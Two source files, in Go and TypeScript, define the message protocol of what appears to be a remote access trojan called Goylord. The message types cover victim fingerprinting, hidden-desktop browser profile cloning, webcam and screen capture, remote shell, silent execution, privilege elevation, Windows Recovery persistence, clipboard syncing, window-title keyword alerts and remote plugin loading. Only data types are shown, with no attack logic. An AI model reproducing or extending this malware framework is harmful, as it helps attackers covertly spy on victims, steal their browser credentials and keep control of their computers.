File: Goylord-Client/cmd/agent/wire/protocol.go
package wire

type Hello struct {
	Type            string          `msgpack:"type"`
	ID              string          `msgpack:"id"`
	HWID            string          `msgpack:"hwid"`
	Host            string          `msgpack:"host"`
	OS              string          `msgpack:"os"`
	Arch            string          `msgpack:"arch"`
	HostArch        string          `msgpack:"hostArch,omitempty"`
	ProtocolVersion int             `msgpack:"protocolVersion,omitempty"`
	Version         string          `msgpack:"version"`
	User            string          `msgpack:"user"`
	Monitors        int             `msgpack:"monitors"`
	MonitorInfo     []MonitorInfo   `msgpack:"monitorInfo,omitempty"`
	Country         string          `msgpack:"country,omitempty"`
	BuildTag        string          `msgpack:"buildTag,omitempty"`
	PublicKey       string          `msgpack:"publicKey,omitempty"`
	Signature       string          `msgpack:"signature,omitempty"`
	InMemory        bool            `msgpack:"inMemory,omitempty"`
	CPU             string          `msgpack:"cpu,omitempty"`
	GPU             string          `msgpack:"gpu,omitempty"`
	RAM             string          `msgpack:"ram,omitempty"`
	StorageTotalGB  string          `msgpack:"storageTotalGb,omitempty"`
	OSFamily        string          `msgpack:"osFamily,omitempty"`
	OSDistro        string          `msgpack:"osDistro,omitempty"`
	OSVersion       string          `msgpack:"osVersion,omitempty"`
	BatteryPercent  *int            `msgpack:"batteryPercent,omitempty"`
	BatteryCharging *bool           `msgpack:"batteryCharging,omitempty"`
	IsAdmin         bool            `msgpack:"isAdmin,omitempty"`
	Elevation       string          `msgpack:"elevation,omitempty"`
	Permissions     map[string]bool `msgpack:"permissions,omitempty"`
	PublicIP        string          `msgpack:"publicIP,omitempty"`
	LastCrashReason string                 `msgpack:"lastCrashReason,omitempty"`
	LastCrashDetail string                 `msgpack:"lastCrashDetail,omitempty"`
	PluginMeta      map[string]interface{} `msgpack:"pluginMeta,omitempty"`
}

type EnrollmentChallenge struct {
	Type  string `msgpack:"type"`
	Nonce string `msgpack:"nonce"`
}

type EnrollmentStatus struct {
	Type   string `msgpack:"type"`
	Status string `msgpack:"status"`
}

type MonitorInfo struct {
	Width  int `msgpack:"width"`
	Height int `msgpack:"height"`
}

type Ping struct {
	Type string `msgpack:"type"`
	TS   int64  `msgpack:"ts,omitempty"`
}

type Pong struct {
	Type string `msgpack:"type"`
	TS   int64  `msgpack:"ts,omitempty"`
}

type Command struct {
	Type        string      `msgpack:"type"`
	CommandType string      `msgpack:"commandType"`
	Payload     interface{} `msgpack:"payload,omitempty"`
	ID          string      `msgpack:"id,omitempty"`
}

type CommandResult struct {
	Type      string `msgpack:"type"`
	CommandID string `msgpack:"commandId,omitempty"`
	OK        bool   `msgpack:"ok"`
	Message   string `msgpack:"message,omitempty"`
}

type DesktopEncoderProfile struct {
	MaxHeight int      `msgpack:"maxHeight"`
	Width     int      `msgpack:"width"`
	Height    int      `msgpack:"height"`
	FPS       int      `msgpack:"fps"`
	Label     string   `msgpack:"label"`
	Providers []string `msgpack:"providers"`
}

type DesktopEncoderCapabilities struct {
	Type      string                  `msgpack:"type"`
	CommandID string                  `msgpack:"commandId,omitempty"`
	Probed    bool                    `msgpack:"probed"`
	Display   int                     `msgpack:"display"`
	Profiles  []DesktopEncoderProfile `msgpack:"profiles"`
	Detail    string                  `msgpack:"detail,omitempty"`
}

type ClientLogEntry struct {
	Seq    uint64 `msgpack:"seq" json:"seq"`
	At     int64  `msgpack:"at" json:"at"`
	Source string `msgpack:"source" json:"source"`
	Blob   string `msgpack:"blob" json:"blob"`
}

type ClientLogsResult struct {
	Type      string           `msgpack:"type"`
	CommandID string           `msgpack:"commandId,omitempty"`
	OK        bool             `msgpack:"ok"`
	Entries   []ClientLogEntry `msgpack:"entries,omitempty"`
	Dropped   uint64           `msgpack:"dropped,omitempty"`
	FromSeq   uint64           `msgpack:"fromSeq,omitempty"`
	ToSeq     uint64           `msgpack:"toSeq,omitempty"`
	Enabled   bool             `msgpack:"enabled"`
	Error     string           `msgpack:"error,omitempty"`
}

type FrameHeader struct {
	Monitor int    `msgpack:"monitor"`
	FPS     int    `msgpack:"fps"`
	Format  string `msgpack:"format"`
	Width   int    `msgpack:"width,omitempty"`
	Height  int    `msgpack:"height,omitempty"`
	Backstage    bool   `msgpack:"backstage,omitempty"`
	Webcam  bool   `msgpack:"webcam,omitempty"`
}

type DesktopStreamStats struct {
	Type      string  `msgpack:"type"`
	FPS       int     `msgpack:"fps"`
	Format    string  `msgpack:"format"`
	Bytes     int     `msgpack:"bytes"`
	Width     int     `msgpack:"width"`
	Height    int     `msgpack:"height"`
	CaptureMs float64 `msgpack:"captureMs"`
	EncodeMs  float64 `msgpack:"encodeMs"`
	SendMs    float64 `msgpack:"sendMs"`
	TotalMs   float64 `msgpack:"totalMs"`
	Transport string  `msgpack:"transport"`
}

type Frame struct {
	Type   string      `msgpack:"type"`
	Header FrameHeader `msgpack:"header"`
	Data   []byte      `msgpack:"data"`
}

type FrameAck struct {
	Type string `msgpack:"type"`
}

type ScreenshotResult struct {
	Type      string `msgpack:"type"`
	CommandID string `msgpack:"commandId,omitempty"`
	Format    string `msgpack:"format"`
	Width     int    `msgpack:"width,omitempty"`
	Height    int    `msgpack:"height,omitempty"`
	Data      []byte `msgpack:"data"`
	Error     string `msgpack:"error,omitempty"`
}

type ConsoleOutput struct {
	Type      string `msgpack:"type"`
	SessionID string `msgpack:"sessionId"`
	Data      []byte `msgpack:"data,omitempty"`
	ExitCode  *int   `msgpack:"exitCode,omitempty"`
	Error     string `msgpack:"error,omitempty"`
}

type FileEntry struct {
	Name    string `msgpack:"name"`
	Path    string `msgpack:"path"`
	IsDir   bool   `msgpack:"isDir"`
	Size    int64  `msgpack:"size"`
	ModTime int64  `msgpack:"modTime"`
	Mode    string `msgpack:"mode,omitempty"`
	Owner   string `msgpack:"owner,omitempty"`
	Group   string `msgpack:"group,omitempty"`
	// windows file attributes
	Attrs uint32 `msgpack:"attrs,omitempty"`
	// Drive / volume disk usage (populated only at root listings for drive entries).
	FreeBytes  int64  `msgpack:"freeBytes,omitempty"`
	TotalBytes int64  `msgpack:"totalBytes,omitempty"`
	FSType     string `msgpack:"fsType,omitempty"`
}

type FileListResult struct {
	Type             string      `msgpack:"type"`
	CommandID        string      `msgpack:"commandId,omitempty"`
	Path             string      `msgpack:"path"`
	Entries          []FileEntry `msgpack:"entries"`
	Error            string      `msgpack:"error,omitempty"`
	AccessDenied     bool        `msgpack:"accessDenied,omitempty"`
	CanRequestAccess bool        `msgpack:"canRequestAccess,omitempty"`
	AccessHelp       string      `msgpack:"accessHelp,omitempty"`
}

type FileDownload struct {
	Type        string `msgpack:"type"`
	CommandID   string `msgpack:"commandId,omitempty"`
	Path        string `msgpack:"path"`
	Data        []byte `msgpack:"data"`
	Offset      int64  `msgpack:"offset"`
	Total       int64  `msgpack:"total"`
	ChunkIndex  int    `msgpack:"chunkIndex,omitempty"`
	ChunksTotal int    `msgpack:"chunksTotal,omitempty"`
	Error       string `msgpack:"error,omitempty"`
}

type FileUploadResult struct {
	Type       string `msgpack:"type"`
	CommandID  string `msgpack:"commandId,omitempty"`
	TransferID string `msgpack:"transferId,omitempty"`
	Path       string `msgpack:"path"`
	OK         bool   `msgpack:"ok"`
	Offset     int64  `msgpack:"offset,omitempty"`
	Size       int64  `msgpack:"size,omitempty"`
	Received   int64  `msgpack:"received,omitempty"`
	Total      int64  `msgpack:"total,omitempty"`
	Error      string `msgpack:"error,omitempty"`
}

type ProcessInfo struct {
	PID      int32   `msgpack:"pid"`
	PPID     int32   `msgpack:"ppid"`
	Name     string  `msgpack:"name"`
	ExePath  string  `msgpack:"exePath,omitempty"`
	CPU      float64 `msgpack:"cpu"`
	Memory   uint64  `msgpack:"memory"`
	Username string  `msgpack:"username,omitempty"`
	Type     string  `msgpack:"type,omitempty"`
	Self     bool    `msgpack:"self,omitempty"`
}

type ProcessListResult struct {
	Type      string        `msgpack:"type"`
	CommandID string        `msgpack:"commandId,omitempty"`
	Processes []ProcessInfo `msgpack:"processes"`
	Error     string        `msgpack:"error,omitempty"`
}

type FileReadResult struct {
	Type      string `msgpack:"type"`
	CommandID string `msgpack:"commandId,omitempty"`
	Path      string `msgpack:"path"`
	Content   string `msgpack:"content"`
	IsBinary  bool   `msgpack:"isBinary"`
	Error     string `msgpack:"error,omitempty"`
}

type FileSearchMatch struct {
	Path  string `msgpack:"path"`
	Line  int    `msgpack:"line,omitempty"`
	Match string `msgpack:"match,omitempty"`
}

type FileSearchResult struct {
	Type      string            `msgpack:"type"`
	CommandID string            `msgpack:"commandId,omitempty"`
	SearchID  string            `msgpack:"searchId"`
	Results   []FileSearchMatch `msgpack:"results"`
	Complete  bool              `msgpack:"complete"`
	Error     string            `msgpack:"error,omitempty"`
}

type FileIconRequestItem struct {
	Key  string `msgpack:"key"`
	Path string `msgpack:"path,omitempty"`
	Ext  string `msgpack:"ext,omitempty"`
}

type FileIconResultItem struct {
	Key   string `msgpack:"key"`
	PNG   []byte `msgpack:"png,omitempty"`
	Error string `msgpack:"error,omitempty"`
}

type FileIconResult struct {
	Type      string               `msgpack:"type"`
	CommandID string               `msgpack:"commandId,omitempty"`
	Icons     []FileIconResultItem `msgpack:"icons"`
}

type FileThumbnailRequestItem struct {
	Key  string `msgpack:"key"`
	Path string `msgpack:"path"`
	Size int    `msgpack:"size,omitempty"`
}

type FileThumbnailResultItem struct {
	Key   string `msgpack:"key"`
	JPEG  []byte `msgpack:"jpeg,omitempty"`
	W     int    `msgpack:"w,omitempty"`
	H     int    `msgpack:"h,omitempty"`
	Error string `msgpack:"error,omitempty"`
}

type FileThumbnailResult struct {
	Type      string                    `msgpack:"type"`
	CommandID string                    `msgpack:"commandId,omitempty"`
	Thumbs    []FileThumbnailResultItem `msgpack:"thumbs"`
}

type FilePeekResult struct {
	Type      string `msgpack:"type"`
	CommandID string `msgpack:"commandId,omitempty"`
	Path      string `msgpack:"path"`
	Data      []byte `msgpack:"data,omitempty"`
	Size      int64  `msgpack:"size"`
	IsText    bool   `msgpack:"isText"`
	Error     string `msgpack:"error,omitempty"`
}

type FileHashResult struct {
	Type      string `msgpack:"type"`
	CommandID string `msgpack:"commandId,omitempty"`
	Path      string `msgpack:"path"`
	Algorithm string `msgpack:"algorithm"`
	Digest    string `msgpack:"digest"`
	Size      int64  `msgpack:"size"`
	Error     string `msgpack:"error,omitempty"`
}

type FolderSizeResult struct {
	Type      string `msgpack:"type"`
	CommandID string `msgpack:"commandId,omitempty"`
	Path      string `msgpack:"path"`
	Bytes     int64  `msgpack:"bytes"`
	Files     int64  `msgpack:"files"`
	Dirs      int64  `msgpack:"dirs"`
	Done      bool   `msgpack:"done"`
	Error     string `msgpack:"error,omitempty"`
}

type ScriptResult struct {
	Type      string `msgpack:"type"`
	CommandID string `msgpack:"commandId,omitempty"`
	OK        bool   `msgpack:"ok"`
	Output    string `msgpack:"output"`
	Error     string `msgpack:"error,omitempty"`
}

type PluginEvent struct {
	Type     string      `msgpack:"type"`
	PluginID string      `msgpack:"pluginId"`
	Event    string      `msgpack:"event"`
	Payload  interface{} `msgpack:"payload,omitempty"`
	Error    string      `msgpack:"error,omitempty"`
}

type Notification struct {
	Type        string `msgpack:"type"`
	Category    string `msgpack:"category"`
	Title       string `msgpack:"title"`
	Process     string `msgpack:"process,omitempty"`
	ProcessPath string `msgpack:"processPath,omitempty"`
	PID         int32  `msgpack:"pid,omitempty"`
	Keyword     string `msgpack:"keyword,omitempty"`
	TS          int64  `msgpack:"ts,omitempty"`
}

type WebcamDevice struct {
	Index  int    `msgpack:"index"`
	Name   string `msgpack:"name"`
	MaxFPS int    `msgpack:"maxFps,omitempty"`
}

type WebcamDevices struct {
	Type     string         `msgpack:"type"`
	Devices  []WebcamDevice `msgpack:"devices"`
	Selected int            `msgpack:"selected"`
}

type BackstageCloneProgress struct {
	Type        string `msgpack:"type"`
	Browser     string `msgpack:"browser"`
	Percent     int    `msgpack:"percent"`
	CopiedBytes int64  `msgpack:"copiedBytes"`
	TotalBytes  int64  `msgpack:"totalBytes"`
	Status      string `msgpack:"status"`
}

type BackstageDXGIStatus struct {
	Type    string `msgpack:"type"`
	Success bool   `msgpack:"success"`
	GPUPid  uint32 `msgpack:"gpuPid"`
	Message string `msgpack:"message"`
}

type BackstageLookupResult struct {
	Type string `msgpack:"type"`
	Exe  string `msgpack:"exe"`
	Path string `msgpack:"path"`
	Done bool   `msgpack:"done"`
}

type BackstageBrowserCheckResult struct {
	Type     string          `msgpack:"type"`
	Browsers map[string]bool `msgpack:"browsers"`
}

type BackstageInstalledApp struct {
	Name    string `msgpack:"name"`
	ExePath string `msgpack:"exePath"`
	Icon    string `msgpack:"icon"`
}

type BackstageInstalledAppsResult struct {
	Type string             `msgpack:"type"`
	Apps []BackstageInstalledApp `msgpack:"apps"`
	Done bool               `msgpack:"done"`
}

type BackstageBrowserLaunchStatus struct {
	Type    string `msgpack:"type"`
	Browser string `msgpack:"browser"`
	Step    string `msgpack:"step"`
	Success bool   `msgpack:"success"`
	Detail  string `msgpack:"detail"`
}

type BackstageWindowEntry struct {
	Title       string `msgpack:"title"`
	X           int    `msgpack:"x"`
	Y           int    `msgpack:"y"`
	Width       int    `msgpack:"width"`
	Height      int    `msgpack:"height"`
	PID         uint32 `msgpack:"pid"`
	ProcessName string `msgpack:"processName"`
	Monitor     int    `msgpack:"monitor"`
}

type BackstageMonitorEntry struct {
	Index   int    `msgpack:"index"`
	Name    string `msgpack:"name"`
	X       int    `msgpack:"x"`
	Y       int    `msgpack:"y"`
	Width   int    `msgpack:"width"`
	Height  int    `msgpack:"height"`
	Primary bool   `msgpack:"primary"`
}

type BackstageWindowListResult struct {
	Type     string             `msgpack:"type"`
	Windows  []BackstageWindowEntry  `msgpack:"windows"`
	Monitors []BackstageMonitorEntry `msgpack:"monitors"`
}

type ClipboardContent struct {
	Type   string `msgpack:"type"`
	Text   string `msgpack:"text"`
	Source string `msgpack:"source"`
}

type ProxyData struct {
	Type         string `msgpack:"type"`
	ConnectionID string `msgpack:"connectionId"`
	Data         []byte `msgpack:"data"`
}

type ProxyClose struct {
	Type         string `msgpack:"type"`
	ConnectionID string `msgpack:"connectionId"`
}

type DisconnectInfo struct {
	Type   string `msgpack:"type"`
	Reason string `msgpack:"reason"`           // "normal", "panic", "crash", "network", "timeout"
	Detail string `msgpack:"detail,omitempty"` // error message
}

type WebRTCP2PAnswer struct {
	Type      string `msgpack:"type"`
	SessionID string `msgpack:"sessionId"`
	Kind      string `msgpack:"kind,omitempty"`
	SDP       string `msgpack:"sdp"`
}

type WebRTCP2PIce struct {
	Type          string `msgpack:"type"`
	SessionID     string `msgpack:"sessionId"`
	Kind          string `msgpack:"kind,omitempty"`
	Candidate     string `msgpack:"candidate"`
	SDPMid        string `msgpack:"sdpMid"`
	SDPMLineIndex uint16 `msgpack:"sdpMLineIndex"`
}

type PrivacyStatus struct {
	Type    string `msgpack:"type"`
	Enabled bool   `msgpack:"enabled"`
}

File: Goylord-Server/src/protocol.ts
import { encode, decode } from "@msgpack/msgpack";

export type MessageKind =
  | "hello"
  | "hello_ack"
  | "ping"
  | "pong"
  | "command"
  | "command_result"
  | "desktop_encoder_capabilities"
  | "desktop_stream_stats"
  | "client_logs_result"
  | "screenshot_result"
  | "frame"
  | "status"
  | "plugin_event"
  | "notification"
  | "webcam_devices"
  | "notification_config"
  | "enrollment_challenge"
  | "enrollment_status";

export type Hello = {
  type: "hello";
  id: string;
  host: string;
  os: string;
  arch: string;
  hostArch?: string;
  protocolVersion?: number;
  version: string;
  user: string;
  monitors: number;
  monitorInfo?: { width: number; height: number }[];
  country?: string;
  hwid?: string;
  inMemory?: boolean;
  cpu?: string;
  gpu?: string;
  ram?: string;
  storageTotalGb?: string;
  osFamily?: string;
  osDistro?: string;
  osVersion?: string;
  batteryPercent?: number;
  batteryCharging?: boolean;
  isAdmin?: boolean;
  elevation?: string;
  permissions?: Record<string, boolean>;
  publicKey?: string;
  signature?: string;
  publicIP?: string;
  lastCrashReason?: string;
  lastCrashDetail?: string;
  pluginMeta?: Record<string, any>;
};

export type EnrollmentChallenge = {
  type: "enrollment_challenge";
  nonce: string;
};

export type EnrollmentStatusMsg = {
  type: "enrollment_status";
  status: "pending" | "approved" | "denied";
};

export type HelloAck = {
  type: "hello_ack";
  id: string;
  commands?: Command[];
  notification?: {
    keywords: string[];
    minIntervalMs?: number;
    clipboardEnabled?: boolean;
  };
};
export type Ping = { type: "ping"; ts?: number };
export type Pong = { type: "pong"; ts?: number };

export type CommandType =
  | "input"
  | "remote_start"
  | "remote_stop"
  | "webcam_start"
  | "webcam_stop"
  | "webcam_list"
  | "webcam_select"
  | "webcam_set_fps"
  | "disconnect"
  | "reconnect"
  | "screenshot"
  | "ping"
  | "console_start"
  | "console_input"
  | "console_stop"
  | "console_resize"
  | "file_list"
  | "file_request_access"
  | "file_download"
  | "file_upload"
  | "file_delete"
  | "file_mkdir"
  | "file_zip"
  | "file_read"
  | "file_write"
  | "file_search"
  | "file_copy"
  | "file_move"
  | "file_chmod"
  | "file_execute"
  | "silent_exec"
  | "voice_session_start"
  | "voice_session_stop"
  | "voice_downlink"
  | "voice_capabilities"
  | "client_logs_request"
  | "desktop_audio_start"
  | "desktop_audio_stop"
  | "process_list"
  | "process_kill"
  | "plugin_load"
  | "plugin_load_http"
  | "plugin_unload"
  | "agent_update"
  | "clipboard_set"
  | "clipboard_sync_start"
  | "clipboard_sync_stop"
  | "desktop_start"
  | "desktop_stop"
  | "desktop_select_display"
  | "desktop_enable_mouse"
  | "desktop_enable_keyboard"
  | "desktop_set_fps"
  | "desktop_set_bitrate"
  | "darwin_request_permissions"
  | "webrtc_publish"
  | "webrtc_stop"
  | "webrtc_p2p_offer"
  | "webrtc_p2p_ice"
  | "webrtc_p2p_stop"
  | "script_exec"
  | "uninstall"
  | "elevate"
  | "file_upload_http"
  | "winre_probe"
  | "winre_install"
  | "winre_uninstall"
  | "file_icon"
  | "file_thumb"
  | "file_dirsize";

export type Command = {
  type: "command";
  commandType: CommandType;
  payload?: unknown;
  id?: string;
};

export type CommandResult = {
  type: "command_result";
  commandId?: string;
  ok: boolean;
  message?: string;
};

export type ClientLogEntry = {
  seq: number;
  at: number;
  source: string;
  blob: string;
};

export type ClientLogsResult = {
  type: "client_logs_result";
  commandId?: string;
  ok: boolean;
  entries?: ClientLogEntry[];
  dropped?: number;
  fromSeq?: number;
  toSeq?: number;
  enabled: boolean;
  error?: string;
};

export type ScreenshotResult = {
  type: "screenshot_result";
  commandId?: string;
  format: "jpeg" | "webp" | "png" | string;
  width?: number;
  height?: number;
  data: Uint8Array;
  error?: string;
};

export type FrameHeader = {
  monitor: number;
  fps: number;
  format: "jpeg" | "webp" | "raw" | "h264" | "hevc";
  width?: number;
  height?: number;
  hash?: string;
  backstage?: boolean;
  webcam?: boolean;
};

export type DesktopCodecCapability = {
  codec: "hevc" | "h264" | "jpeg" | "raw" | string;
  encoders?: string[];
  transports: Array<"websocket" | "webrtc" | string>;
  hardware?: boolean;
};

export type DesktopEncoderCapabilities = {
  type: "desktop_encoder_capabilities";
  commandId?: string;
  probed: boolean;
  display: number;
  profiles: Array<{
    maxHeight: number;
    width: number;
    height: number;
    fps: number;
    label: string;
    providers: string[];
  }>;
  codecs: DesktopCodecCapability[];
  detail?: string;
};

export type Frame = { type: "frame"; header: FrameHeader; data: Uint8Array };
export type FrameAck = { type: "frame_ack" };
export type DesktopStreamStats = {
  type: "desktop_stream_stats";
  fps: number;
  format: string;
  bytes: number;
  width: number;
  height: number;
  captureMs: number;
  encodeMs: number;
  sendMs: number;
  totalMs: number;
  transport: "websocket" | "webrtc" | string;
};
export type Status = {
  type: "status";
  state: "idle" | "streaming" | "error";
  detail?: string;
};

export type WebcamDevice = {
  index: number;
  name: string;
  maxFps?: number;
};

export type WebcamDevices = {
  type: "webcam_devices";
  devices: WebcamDevice[];
  selected: number;
};
export type ConsoleOutput = {
  type: "console_output";
  sessionId: string;
  data?: Uint8Array;
  exitCode?: number;
  error?: string;
};

export type FileEntry = {
  name: string;
  path: string;
  isDir: boolean;
  size: number;
  modTime: number;
  mode?: string;
  owner?: string;
  group?: string;
  attrs?: number;
};

export type FileIconResultItem = {
  key: string;
  png?: Uint8Array;
  error?: string;
};

export type FileIconResult = {
  type: "file_icon_result";
  commandId?: string;
  icons: FileIconResultItem[];
};

export type FileThumbnailResultItem = {
  key: string;
  jpeg?: Uint8Array;
  w?: number;
  h?: number;
  error?: string;
};

export type FileThumbnailResult = {
  type: "file_thumb_result";
  commandId?: string;
  thumbs: FileThumbnailResultItem[];
};

export type FolderSizeResult = {
  type: "file_dirsize_result";
  commandId?: string;
  path: string;
  bytes: number;
  files: number;
  dirs: number;
  done: boolean;
  error?: string;
};

export type FileListResult = {
  type: "file_list_result";
  commandId?: string;
  path: string;
  entries: FileEntry[];
  error?: string;
  accessDenied?: boolean;
  canRequestAccess?: boolean;
  accessHelp?: string;
};

export type FileDownload = {
  type: "file_download";
  commandId?: string;
  path: string;
  data: Uint8Array;
  offset: number;
  total: number;
  chunkIndex?: number;
  chunksTotal?: number;
  error?: string;
};

export type FileUploadResult = {
  type: "file_upload_result";
  commandId?: string;
  transferId?: string;
  path: string;
  ok: boolean;
  offset?: number;
  size?: number;
  received?: number;
  total?: number;
  error?: string;
};

export type ProcessInfo = {
  pid: number;
  ppid: number;
  name: string;
  exePath?: string;
  cpu: number;
  memory: number;
  username?: string;
  type?: string;
  self?: boolean;
};

export type ProcessListResult = {
  type: "process_list_result";
  commandId?: string;
  processes: ProcessInfo[];
  error?: string;
};

export type FileReadResult = {
  type: "file_read_result";
  commandId?: string;
  path: string;
  content: string;
  isBinary: boolean;
  error?: string;
};

export type FileSearchResult = {
  type: "file_search_result";
  commandId?: string;
  searchId: string;
  results: Array<{
    path: string;
    line?: number;
    match?: string;
  }>;
  complete: boolean;
  error?: string;
};

export type ScriptResult = {
  type: "script_result";
  commandId?: string;
  ok: boolean;
  output?: string;
  error?: string;
};

export type PluginManifest = {
  id: string;
  name: string;
  apiVersion?: number;
  runtime?: "native" | "wasm" | "server" | string;
  nativeLoader?: "memory" | "os" | string;
  nativeEntrypoints?: PluginNativeEntrypoints;
  version?: string;
  description?: string;
  binary?: string;
  binaries?: Record<string, string>;
  wasm?: string;
  needs?: PluginNeeds;
  entry?: string;
  assets?: {
    html?: string;
    css?: string;
    js?: string;
  };
  navbar?: {
    label?: string;
    icon?: string;
  };
  dashboard?: PluginDashboardIntegration;
  build?: PluginBuildIntegration;
  hasServer?: boolean;
};

export type PluginNativeEntrypoints = {
  onLoad?: string;
  onEvent?: string;
  onUnload?: string;
  setCallback?: string;
  getRuntime?: string;
};

export type PluginDashboardIntegration = {
  clientBadges?: PluginDashboardBadgeDefinition[];
};

export type PluginDashboardBadgeDefinition = {
  id: string;
  label?: string;
  title?: string;
  icon?: string;
  imageUrl?: string;
  href?: string;
  tone?: "info" | "good" | "warn" | "danger" | string;
  priority?: number;
};

export type PluginBuildIntegration = {
  enabledByDefault?: boolean;
  label?: string;
  description?: string;
  settings?: PluginBuildSetting[];
  actions?: PluginBuildAction[];
  requires?: PluginBuildRequirement[];
};

export type PluginBuildSetting = {
  key: string;
  label?: string;
  type?: "string" | "number" | "boolean" | "select" | "textarea" | string;
  default?: unknown;
  placeholder?: string;
  description?: string;
  required?: boolean;
  min?: number;
  max?: number;
  options?: Array<{ value: string; label?: string } | string>;
};

export type PluginBuildAction = {
  id: string;
  label: string;
  icon?: string;
  description?: string;
  setBuild?: Record<string, unknown>;
  setSettings?: Record<string, unknown>;
  requires?: PluginBuildRequirement[];
};

export type PluginBuildRequirement = {
  field?: string;
  pluginSetting?: string;
  equals?: unknown;
  notEquals?: unknown;
  truthy?: boolean;
  falsy?: boolean;
  includes?: unknown;
  platforms?: string[];
  message?: string;
};

export type PluginFileNeed = {
  bucket: "home" | "desktop" | "documents" | "downloads" | "temp" | "appData" | "pluginData" | "fullDisk" | string;
  access: Array<"read" | "write" | "list" | "delete" | "mkdir" | string>;
  reason?: string;
};

export type PluginNeeds = {
  files?: PluginFileNeed[];
};

export type PluginSignatureInfo = {
  signed: boolean;
  trusted: boolean;
  valid: boolean;
  fingerprint?: string;
  algorithm?: string;
};

export type PluginEvent = {
  type: "plugin_event";
  pluginId: string;
  event: string;
  payload?: unknown;
  error?: string;
};

export type NotificationEvent = {
  type: "notification";
  category: "active_window";
  title: string;
  process?: string;
  processPath?: string;
  pid?: number;
  keyword?: string;
  ts?: number;
};

export type NotificationConfig = {
  type: "notification_config";
  keywords: string[];
  minIntervalMs?: number;
  clipboardEnabled?: boolean;
};

export type WireMessage =
  | Hello
  | HelloAck
  | Ping
  | Pong
  | Command
  | CommandResult
  | ClientLogsResult
  | ScreenshotResult
  | Frame
  | FrameAck
  | DesktopStreamStats
  | Status
  | ConsoleOutput
  | FileListResult
  | FileDownload
  | FileUploadResult
  | ProcessListResult
  | FileReadResult
  | FileSearchResult
  | ScriptResult
  | PluginEvent
  | NotificationEvent
  | NotificationConfig
  | EnrollmentChallenge
  | EnrollmentStatusMsg;

export function encodeMessage(msg: WireMessage): Uint8Array {
  return encode(msg);
}

export function decodeMessage(
  input: Uint8Array | ArrayBuffer | string,
): WireMessage {
  if (typeof input === "string") {
    return JSON.parse(input) as WireMessage;
  }
  return decode(input) as WireMessage;
}
